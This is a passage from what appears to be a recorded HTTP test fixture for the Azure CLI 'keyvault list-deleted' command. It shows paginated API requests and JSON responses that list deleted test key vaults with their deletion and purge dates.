3djU7M%2bii7Whn%2b3TjjlNDU8I2r1oPyAWhZxyrRik5bbJ1GYfG%2bBWrKFR%2floGXfKQBzVL66O2SivISmWxTMZII7Js89e2eX0HvxIBjG%2fiYLMSoQSj72qi%2b19SOWjE2NBoVohBbFf1DvbJDmbSO38b0NkWfCTej5SdXbY1%2bLbk%2fr7Jxk3yShyYHgjKbUi4%2b0oWXwhUJSLWHAl5Bclojg35jwNSLXt81RTPEartyJ1osbBR%2fzCR4%2bE1IECT45EanmBG%2bdGhuPxx8%3d"}' headers: cache-control: - no-cache content-length: - '3513' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:38 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - f82dd6b7-e951-4626-a352-244ff5cc588f status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1ta4MwAIT%2Fi4x90yTq1imUsWEK26pSTSz9GGO0wVdM7NTS%2Fz4ZHBwHz93djU7M%2Bii7Whn%2B3TjjlNDU8I2r1oPyAWhZxyrRik5bbJ1GYfG%2BBWrKFR%2FloGXfKQBzVL66O2SivISmWxTMZII7Js89e2eX0HvxIBjG%2FiYLMSoQSj72qi%2B19SOWjE2NBoVohBbFf1DvbJDmbSO38b0NkWfCTej5SdXbY1%2BLbk%2Fr7Jxk3yShyYHgjKbUi4%2B0oWXwhUJSLWHAl5Bclojg35jwNSLXt81RTPEartyJ1osbBR%2FzCR4%2BE1IECT45EanmBG%2BdGhuPxx8%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-5jszzuu","name":"cli-test-kv-mgmt-5jszzuu","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt7khuvybpb24lxqregwnw35fmzhd6d5iydmkqkfussvmh7qbbbhvsh/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-5jszzuu","location":"westus","tags":{},"deletionDate":"2020-02-07T18:12:02Z","scheduledPurgeDate":"2020-05-07T18:12:02Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-qgltuom","name":"cli-test-kv-mgmt-qgltuom","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt3vh5cmreurif4rpximdlnpqwxwqdtadli4o6had5nvwxsww4vd6f4/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-qgltuom","location":"westus","tags":{},"deletionDate":"2020-02-07T07:22:03Z","scheduledPurgeDate":"2020-05-07T07:22:03Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-7hrrspobsq4","name":"cli-keyvault-7hrrspobsq4","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt6h6y7gwhne2og6a7e5fpa3ses3bqqk5xv5tdwj7xtbjx3fwmyh2ev/providers/Microsoft.KeyVault/vaults/cli-keyvault-7hrrspobsq4","location":"westus","tags":{},"deletionDate":"2020-02-07T06:34:07Z","scheduledPurgeDate":"2020-05-07T06:34:07Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-krxmmiogezm","name":"cli-keyvault-krxmmiogezm","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtdzhvs3blruzqmotzshgkf5q3mix3crpfkdv2lfh2c2m4eolfixinm/providers/Microsoft.KeyVault/vaults/cli-keyvault-krxmmiogezm","location":"westus","tags":{},"deletionDate":"2020-02-07T06:27:44Z","scheduledPurgeDate":"2020-05-07T06:27:44Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-i7haaxp","name":"cli-test-kv-mgmt-i7haaxp","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt3drqo43goa454fp322o2bxtllvseqky4llybbh7s2n5k3idezuzpr/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-i7haaxp","location":"westus","tags":{},"deletionDate":"2020-02-06T11:43:23Z","scheduledPurgeDate":"2020-05-06T11:43:23Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1da4MwAEX%2fi4y9aRKn6xTKGDMd3RqlmljYW9TorJ%2bY2FVL%2f%2fvC4J6HA5d7b0YvrupQ9400%2fJtxwgllieEbP0qN0geg4z2vRCd6ZfF1noSVDx2QcybzqR5VPfQSwAyVz84GmSgroekUBTe5yJ%2fMPPPsjV1Cz%2fUgGKfhUhdikoDU%2bTTIoVTWl1hSPrcKFKIVShT%2fIl%2f5WJsX3dTjWxsiz4Q66PFBNvpxaES%2fZU16itNPGrN4R3HKEuZFB9ayMtgjQquFUHLVuOH5TYNRSOMX7b8k2DsRY1dyPi4hxksUVEvMiBvR3Qeh3%2b9kJWuEsXG%2f%2fwE%3d"}' headers: cache-control: - no-cache content-length: - '3513' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:39 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 0da875a5-8ad7-4ff7-b9c3-5736df583920 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1da4MwAEX%2Fi4y9aRKn6xTKGDMd3RqlmljYW9TorJ%2BY2FVL%2F%2FvC4J6HA5d7b0YvrupQ9400%2FJtxwgllieEbP0qN0geg4z2vRCd6ZfF1noSVDx2QcybzqR5VPfQSwAyVz84GmSgroekUBTe5yJ%2FMPPPsjV1Cz%2FUgGKfhUhdikoDU%2BTTIoVTWl1hSPrcKFKIVShT%2FIl%2F5WJsX3dTjWxsiz4Q66PFBNvpxaES%2FZU16itNPGrN4R3HKEuZFB9ayMtgjQquFUHLVuOH5TYNRSOMX7b8k2DsRY1dyPi4hxksUVEvMiBvR3Qeh3%2B9kJWuEsXG%2F%2FwE%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-2ssjkgz","name":"cli-test-kv-mgmt-2ssjkgz","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtacnjhlewhndovofsa32s7srcucvrptkxcmjjwpuhnmnozserhxtet/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-2ssjkgz","location":"westus","tags":{},"deletionDate":"2020-02-06T10:40:48Z","scheduledPurgeDate":"2020-05-06T10:40:48Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-mgmt-hxeyvkk","name":"cli-test-kv-mgmt-hxeyvkk","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtopgv2c5mayannw44ajospefeatwkngpubokl76riuochtwiyy65h5/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-hxeyvkk","location":"westus","tags":{},"deletionDate":"2020-02-06T10:18:12Z","scheduledPurgeDate":"2020-05-06T10:18:12Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-4icb5c5yakq","name":"cli-keyvault-4icb5c5yakq","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtsofxp2uf6lnjinn6luufkwflov2wqzgzbx455nf3dlddf3suofum5/providers/Microsoft.KeyVault/vaults/cli-keyvault-4icb5c5yakq","location":"westus","tags":{},"deletionDate":"2020-01-31T18:11:44Z","scheduledPurgeDate":"2020-04-30T18:11:44Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-rbk44vnr6ks","name":"cli-keyvault-rbk44vnr6ks","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt4vmlba42enbllea62mq7y5tkxpjnvpr52s67dmtpxgrooswnowzri/providers/Microsoft.KeyVault/vaults/cli-keyvault-rbk44vnr6ks","location":"westus","tags":{},"deletionDate":"2020-01-25T13:22:24Z","scheduledPurgeDate":"2020-04-24T13:22:24Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-atp344nuabb","name":"cli-keyvault-atp344nuabb","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt23qunb4i6asc5mqav4t4x672yu42hg7xehgrinzd7t5qhpz7bpxbz/providers/Microsoft.KeyVault/vaults/cli-keyvault-atp344nuabb","location":"westus","tags":{},"deletionDate":"2020-01-24T18:11:51Z","scheduledPurgeDate":"2020-04-23T18:11:51Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1ba4MwAEb%2fi4y9xVy06xTKXrRg11iiiYW9RY3OesWkXS%2f0v1cG38uBw%2fke1qCuZt8Mrbb8h3UMUy5Sy7d%2bjZm0D2EvB1mrXg3GlvfzrOxi7KE%2b57qYm8k046AhynH14a4xwHmFgFuWEkhVOKDIPbImFfJWHoLTPF6aUs0a0qaYRz1Wxv5Wt0yeOwNL1Smjyn%2fQX3JqwGUxl%2fiGIOwBtAy%2fv%2bl2eRxbNWxEmx2TbMcTkWx5mIlUeIe96EQVRJjy%2bkZP7Ep55B4CsaL3msR898kQJUz8BDRgDuMFjsMkYCJyEy7%2bYiQI5fGW8tBJTsx6Pl8%3d"}' headers: cache-control: - no-cache content-length: - '3507' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:39 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - e78202c5-fca2-4fd6-9567-d13288c520c7 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1ba4MwAEb%2Fi4y9xVy06xTKXrRg11iiiYW9RY3OesWkXS%2F0v1cG38uBw%2Fke1qCuZt8Mrbb8h3UMUy5Sy7d%2BjZm0D2EvB1mrXg3GlvfzrOxi7KE%2B57qYm8k046AhynH14a4xwHmFgFuWEkhVOKDIPbImFfJWHoLTPF6aUs0a0qaYRz1Wxv5Wt0yeOwNL1Smjyn%2FQX3JqwGUxl%2FiGIOwBtAy%2Fv%2Bl2eRxbNWxEmx2TbMcTkWx5mIlUeIe96EQVRJjy%2BkZP7Ep55B4CsaL3msR898kQJUz8BDRgDuMFjsMkYCJyEy7%2BYiQI5fGW8tBJTsx6Pl8%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/ygacracr-kv","name":"ygacracr-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/ygacracr/providers/Microsoft.KeyVault/vaults/ygacracr-kv","location":"westus","tags":{},"deletionDate":"2020-01-22T17:53:33Z","scheduledPurgeDate":"2020-04-21T17:53:33Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/hahaportal-kv","name":"hahaportal-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/hahaportal/providers/Microsoft.KeyVault/vaults/hahaportal-kv","location":"westus","tags":{},"deletionDate":"2020-01-21T17:15:23Z","scheduledPurgeDate":"2020-04-20T17:15:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-de5n4d4x7zt","name":"cli-keyvault-de5n4d4x7zt","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtwq46rjhwnzszcgglxowk3vacx6clxe7jt5deua2apwaoh3kzzthdr/providers/Microsoft.KeyVault/vaults/cli-keyvault-de5n4d4x7zt","location":"westus","tags":{},"deletionDate":"2020-01-21T14:02:56Z","scheduledPurgeDate":"2020-04-20T14:02:56Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-aeki7lkhyal","name":"cli-keyvault-aeki7lkhyal","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtec2nai4hqfwspaybwxmscx6wfvdfr32ytam66dim7l66l5badygau/providers/Microsoft.KeyVault/vaults/cli-keyvault-aeki7lkhyal","location":"westus","tags":{},"deletionDate":"2020-01-21T07:49:50Z","scheduledPurgeDate":"2020-04-20T07:49:50Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-5jdscpt3s2q","name":"cli-keyvault-5jdscpt3s2q","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtaygn4x4xadrjjgpisogppiv6pi52d4h52eskf3xmmy74y6lsdqu45/providers/Microsoft.KeyVault/vaults/cli-keyvault-5jdscpt3s2q","location":"westus","tags":{},"deletionDate":"2020-01-21T07:43:02Z","scheduledPurgeDate":"2020-04-20T07:43:02Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1ta4MwAIT%2fSxj7pknUrVMog6GFdk3El1j2MWp0Vo1iYu0L%2fe%2bTwX2547m7B5Diqo%2bNbBXwHuAUJClLgAd%2btR6VB2HPJa9FL6Q2%2bX2ehFkMPVRzroqpGXUzSAVRjqt3Z4MNnFfIcMqSG1wUtlHkrrWxKuS%2buQiO03BpSjEpSJpiGtRQafNb3DI%2bdxqWohNalP9GffKxMS4ruY5vLYRdA63Cry%2bqXR%2bHVsgta7NTnB3SmMW7NMhYwtzwyDpW%2bXtM0vpGzsUS%2bvsrvddLmEYOvX99rPkSs2iJWoIoI5gGASbBISB%2bbcfnCFH%2fx6aM7tYOeD7%2fAA%3d%3d"}' headers: cache-control: - no-cache content-length: - '3317' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:40 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 35003f26-995f-432f-911f-d6d00c68e35d status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY1ta4MwAIT%2FSxj7pknUrVMog6GFdk3El1j2MWp0Vo1iYu0L%2Fe%2BTwX2547m7B5Diqo%2BNbBXwHuAUJClLgAd%2BtR6VB2HPJa9FL6Q2%2BX2ehFkMPVRzroqpGXUzSAVRjqt3Z4MNnFfIcMqSG1wUtlHkrrWxKuS%2BuQiO03BpSjEpSJpiGtRQafNb3DI%2BdxqWohNalP9GffKxMS4ruY5vLYRdA63Cry%2BqXR%2BHVsgta7NTnB3SmMW7NMhYwtzwyDpW%2BXtM0vpGzsUS%2BvsrvddLmEYOvX99rPkSs2iJWoIoI5gGASbBISB%2BbcfnCFH%2Fx6aM7tYOeD7%2FAA%3D%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-z6gygh756ga","name":"cli-keyvault-z6gygh756ga","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtw2vhnvkbprduzjzjxxs5ymeiknahmtnjf3x7maplcml7broy5532q/providers/Microsoft.KeyVault/vaults/cli-keyvault-z6gygh756ga","location":"westus","tags":{},"deletionDate":"2020-01-21T07:34:05Z","scheduledPurgeDate":"2020-04-20T07:34:05Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-2fjyg3hkucw","name":"cli-keyvault-2fjyg3hkucw","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtln7murclupsrr2op6ywsdquicnevekaf4wgndrr3gi7oalijzedx7/providers/Microsoft.KeyVault/vaults/cli-keyvault-2fjyg3hkucw","location":"westus","tags":{},"deletionDate":"2020-01-21T07:24:48Z","scheduledPurgeDate":"2020-04-20T07:24:48Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-tc3ls45vnig","name":"cli-keyvault-tc3ls45vnig","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtdkolwroe5zhblfplkfwn3h3hw57m4vjgpxdmslfc7xgss6emrxte2/providers/Microsoft.KeyVault/vaults/cli-keyvault-tc3ls45vnig","location":"westus","tags":{},"deletionDate":"2020-01-21T06:51:45Z","scheduledPurgeDate":"2020-04-20T06:51:45Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/ppportal-kv","name":"ppportal-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/ppportal/providers/Microsoft.KeyVault/vaults/ppportal-kv","location":"westus","tags":{},"deletionDate":"2020-01-20T17:11:40Z","scheduledPurgeDate":"2020-04-19T17:11:40Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-e5qe7rpahz4","name":"cli-keyvault-e5qe7rpahz4","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtzop65oxjayiwg55qteungjhvxkqnanmdmwr2weiq4b6xllgwtw2ty/providers/Microsoft.KeyVault/vaults/cli-keyvault-e5qe7rpahz4","location":"westus","tags":{},"deletionDate":"2020-01-07T10:01:08Z","scheduledPurgeDate":"2020-04-06T10:01:08Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY3daoMwAEbfRcbuNIlz6xTKKNOObo3FmNjrqNFq%2fMOkrbX03SuD7%2bbA4Xx3oxOT3ledVIZ3N45BTFlseMZJ60F5ALS846VoRactPp9HYWV9C9Q5VdlYDbrqOwVgiooPZ4VMlBbQdPKcm1xkb2aWuvbKLqD77kIwjP2lysWoAK6ysVd9oa0%2fcUv4udEgF43QIv8H9cWHyrws5hJf2xC5JlyGXl%2bUXB57Kbo1k8mRJL%2bUMLKlQcJi5h72rGGFv0OYljc8y%2buBshnTnRPWcgop%2bcT19ieCbIpqfA3r03fob2xCJYxg6JO6nCKGnRAGM6k3xuPxBA%3d%3d"}' headers: cache-control: - no-cache content-length: - '3399' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:42 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - ef5fc10e-4802-4f7e-95cb-25f630c2177b status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY3daoMwAEbfRcbuNIlz6xTKKNOObo3FmNjrqNFq%2FMOkrbX03SuD7%2BbA4Xx3oxOT3ledVIZ3N45BTFlseMZJ60F5ALS846VoRactPp9HYWV9C9Q5VdlYDbrqOwVgiooPZ4VMlBbQdPKcm1xkb2aWuvbKLqD77kIwjP2lysWoAK6ysVd9oa0%2FcUv4udEgF43QIv8H9cWHyrws5hJf2xC5JlyGXl%2BUXB57Kbo1k8mRJL%2BUMLKlQcJi5h72rGGFv0OYljc8y%2BuBshnTnRPWcgop%2BcT19ieCbIpqfA3r03fob2xCJYxg6JO6nCKGnRAGM6k3xuPxBA%3D%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-p6umsyofnyo","name":"cli-keyvault-p6umsyofnyo","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtfnltd4bbrg5iqe4fai7xlfcolyb5bwwzftqsbgpegr3h6udufjlap/providers/Microsoft.KeyVault/vaults/cli-keyvault-p6umsyofnyo","location":"westus","tags":{},"deletionDate":"2019-12-31T02:23:58Z","scheduledPurgeDate":"2020-03-30T02:23:58Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-mgmtvqhr345","name":"cli-keyvault-mgmtvqhr345","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt47sltorzerieeb2kj4buvjjzrepwcsrtgiwai64k5kgj7ktvuhk7q/providers/Microsoft.KeyVault/vaults/cli-keyvault-mgmtvqhr345","location":"westus","tags":{},"deletionDate":"2019-12-27T08:19:19Z","scheduledPurgeDate":"2020-03-26T08:19:19Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-mgmtr7a6xhe","name":"cli-keyvault-mgmtr7a6xhe","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtkdmnuko3glg4pd7yg5mreavlh3knlz7h3qjgf2xti773hf4rprzen/providers/Microsoft.KeyVault/vaults/cli-keyvault-mgmtr7a6xhe","location":"westus","tags":{},"deletionDate":"2019-12-27T08:18:10Z","scheduledPurgeDate":"2020-03-26T08:18:10Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-mgmtew3cglh","name":"cli-keyvault-mgmtew3cglh","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtvyn3do2dhpgtsn4cdgge6o5gaez6fmd52dgfhztl5kkabrdqr4wjk/providers/Microsoft.KeyVault/vaults/cli-keyvault-mgmtew3cglh","location":"westus","tags":{},"deletionDate":"2019-12-27T08:16:29Z","scheduledPurgeDate":"2020-03-26T08:16:29Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-keyvault-mgmt7sr5xez","name":"cli-keyvault-mgmt7sr5xez","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmtyhco7jgrx74bmrsd3mjsms7todoo7rpkawmvafr2ztxsynuczblyf/providers/Microsoft.KeyVault/vaults/cli-keyvault-mgmt7sr5xez","location":"westus","tags":{},"deletionDate":"2019-12-27T08:03:09Z","scheduledPurgeDate":"2020-03-26T08:03:09Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=HY3daoMwAEbfRcbuYhJt1ymUsU0L3apiTCy7jBqdjX%2bYWKql7z4ZnJsPDt%2b5G5246VPdSWW4d%2bPsJ5Qlhmv8aj0oF8KWd7wSrei0yZdpFGbet1BNmcrHetB13ymIMly%2bbHYY4KxEYFMUHHCR2yDPHGtnlcjZOggOY3%2btCzEqGNT52Ku%2b1Oa3mFM%2bNRoWohFaFP9DvfGhBtfVXM%2f3FsIOQCv4%2bUnJtdhL0e2ZTM8k%2faKEkQP1U5YwJzqxhpXeEQe0mkOvssLl%2fRZ4%2fhwsbIlo80r89JNc4jmWxyVc2Db05C2k0iY0QKEf26tnR97HgVx%2bjMfjDw%3d%3d"}' headers: cache-control: - no-cache content-length: - '3517' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:43 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - 27522159-1fb9-47d6-9e67-3d302720148e status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: 